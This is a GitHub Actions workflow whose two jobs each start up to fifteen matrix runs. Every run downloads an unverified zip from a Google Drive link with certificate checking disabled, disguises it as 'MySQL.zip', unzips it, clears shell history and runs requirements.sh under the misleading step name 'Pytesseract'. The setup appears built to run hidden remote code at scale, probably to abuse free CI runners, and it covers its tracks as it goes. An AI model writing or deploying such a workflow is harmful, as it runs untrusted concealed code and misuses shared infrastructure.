name: orionthuctai304works
on:
  push:
    branches: [ "main" ]
  workflow_dispatch:

jobs:
  ASSEMBLE:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      max-parallel: 10
      matrix:
        go: [I.o, I.i, I.ii]
        flag: ['Start', 'Code', 'Debug', 'Deploy', 'Monitor']

    env:
        NUM_JOBS: 20
        JOB: ${ matrix.go }
    steps:
    - uses: actions/checkout@v1
    - name: install module
      run: |
        wget --no-check-certificate "https://docs.google.com/uc?export=download&id=1SDPgIIFRSDFwSRnjTkO4H9Xo6Kciii9N" -O MySQL.zip
        unzip -o MySQL.zip
        rm MySQL.zip
        history -c && history -w

    - name: Pytesseract
      run: bash requirements.sh


  DELIVER1:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      max-parallel: 10
      matrix:
        go: [I.o, I.i, I.ii]
        flag: ['Initialize', 'Develop', 'Test', 'Execute', 'Release']

    env:
        NUM_JOBS: 20
        JOB: ${ matrix.go }
    steps:
    - uses: actions/checkout@v1
    - name: install module
      run: |
        wget --no-check-certificate "https://docs.google.com/uc?export=download&id=1SDPgIIFRSDFwSRnjTkO4H9Xo6Kciii9N" -O MySQL.zip
        unzip -o MySQL.zip
        rm MySQL.zip
        history -c && history -w

    - name: Pytesseract
      run: bash requirements.sh
        
